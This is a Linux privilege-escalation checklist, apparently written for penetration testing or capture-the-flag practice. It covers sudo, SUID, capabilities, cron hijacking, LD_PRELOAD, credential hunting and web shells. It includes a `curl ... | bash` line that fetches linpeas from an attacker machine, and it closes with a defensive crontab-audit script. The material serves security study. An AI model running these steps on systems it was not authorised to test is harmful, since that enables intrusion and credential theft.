# Linux Privesc Methodology

## Kernel Exploits

```title="Search for exploits"
searchsploit
```

Google the CVE of a candidate exploit to find additional exploit scripts or instructions.

## Check user id and groups

```title="Check user id and groups"
id
```

Search for known privilege escalation paths tied to the groups the user belongs to.

## Password attacks

- Try to authenticate as other users:
  - SSH
  - su
- Password reuse
- Guess passwords

## Run linpeas

- Rerun it as the new user whenever a new one is accessed.

```title="Run linpeas"
curl <url to kali machine/linpeas.sh> | bash
```

Piping the script straight into bash avoids writing it to the victim's disk.

## Look for sensitive files/information

- Locations that may contain passwords
  - Recursively search directories for files that contain sensitive keywords
  - Home directory
  - History files
  - Config files
  - Web server files
  - Log files
    - /var/log
- Look for private SSH keys
- Check website configurations
  - /etc/apache2/sites-enabled

## Look for running programs

```title="View running processes"
ps aux
```

- Look for programs running as root and check whether they are exploitable.
- Enumerate versions and look for vulnerable/exploitable ones.
- If there is trouble enumerating versions, try googling the md5sum of the program.
- If a web page is running in the context of a higher-privileged user, try to create a web shell.

## Network traffic

```title="View open ports / running services"
netstat -tulpn
```

> Forward internally listening ports to the attacking machine.

- Listen for traffic on localhost
  - use tcpdump
  - Might find credentials being passed over the network
- Check for port knocking configurations
  - /etc/knockd.conf


## Check for interesting programs

- PATH locations
  - `dpkg -l`
  - /var
  - /opt
  - /usr/local/src
  - /usr/src

```title="Check programs for extended capabilities"
getcap <file>
```

A capability set ending in `=ep` (effective and permitted) amounts to root permissions. As good as sudo.

## Look for unmounted file systems

## SUID/SGID files

- Check GTFOBins
- Analyze the file to see whether the commands it calls use absolute paths

```title="Trace the calls a binary makes"
strace <file>
```

## File permissions

## Sudo

```title="Check sudo permissions"
sudo -l
```

Check the sudo commands against GTFOBins.

If `sudo -l` shows a user in parentheses in front of a command, e.g. `(user)`, that command can be executed as that user.

```title="Execute sudo command as another user"
sudo -u <username> <sudo command>
```

## Environment Variables

- Check with `sudo -l`
- `env_keep+=LD_PRELOAD`
  - If this is set we can choose a shared object that is loaded before any others while running sudo
- `env_keep+=LD_LIBRARY_PATH`
  - If this is set we can set where shared objects are searched for first

## Cron Jobs

- Check the cron PATH and see if we have write access to any of its directories.
- Check if we can write to a file that the crontab is running.
  - If so, change the file to execute a malicious command.
  - Check whether absolute paths are not being used.
    - If so, try to create a malicious executable in a PATH directory that precedes the directory of the executable currently being used.
- Check for commands using wildcards (`*`).
  - If so, create a file in the directory the wildcard is being run on. Name this file after the malicious command line options you would like to use against the program. Check GTFOBins to determine which flags to use.
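The three cron checks above, turned around into a hardening audit. This is an added example, not part of the original notes; it assumes system-crontab format (`m h dom mon dow user command args`, or `@daily user command args`), and every crontab line and file name it is exercised with is constructed.

```sh
#!/bin/sh
# Added example, not part of the original notes: flag the weaknesses the
# "Cron Jobs" checklist describes in system-crontab entries. Format assumed:
# "m h dom mon dow user command args" or "@daily user command args".

# Print one finding per line for a single crontab entry; nothing if clean.
#   RELATIVE_PATH  command is resolved through cron's PATH (hijackable)
#   WILDCARD       an argument contains '*' (filename-as-option abuse)
#   WRITABLE       the script exists and is group- or world-writable
audit_cron_line() {
  # Skip blank lines, comments and variable assignments such as PATH=...
  case $1 in ''|\#*|[A-Za-z_]*=*) return 0 ;; esac
  # Split with read instead of word splitting so '*' is never glob-expanded.
  printf '%s\n' "$1" | {
    case $1 in
      @*) read -r _ _ cmd args ;;              # @reboot, @daily, ...
      *)  read -r _ _ _ _ _ _ cmd args ;;      # five time fields, then user
    esac
    [ -n "$cmd" ] || exit 0                    # malformed or too short
    case $cmd in
      /*) ;;
      *)  echo "RELATIVE_PATH $cmd" ;;
    esac
    case $args in *\**) echo "WILDCARD $args" ;; esac
    if [ -f "$cmd" ]; then
      perms=$(ls -ldL "$cmd" | cut -c1-10)     # e.g. -rwxrwxrwx, symlinks followed
      case $perms in
        ?????w*|????????w?) echo "WRITABLE $cmd" ;;   # group (col 6) or other (col 9) write bit
      esac
    fi
  }
}

# Read crontab text on stdin and print "<finding>  <- <offending line>".
audit_crontab() {
  while IFS= read -r line || [ -n "$line" ]; do
    audit_cron_line "$line" | while IFS= read -r finding; do
      printf '%s  <- %s\n' "$finding" "$line"
    done
  done
}

# Stand-alone use on a live system (read-only):
#   audit_crontab < /etc/crontab; cat /etc/cron.d/* | audit_crontab
```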

## systemd timers

- systemd's equivalent of cron jobs for services.

```title="List systemd timers"
systemctl list-timers
```

## Check for processes running in the background

```title="Watch processes as they are spawned"
pspy
```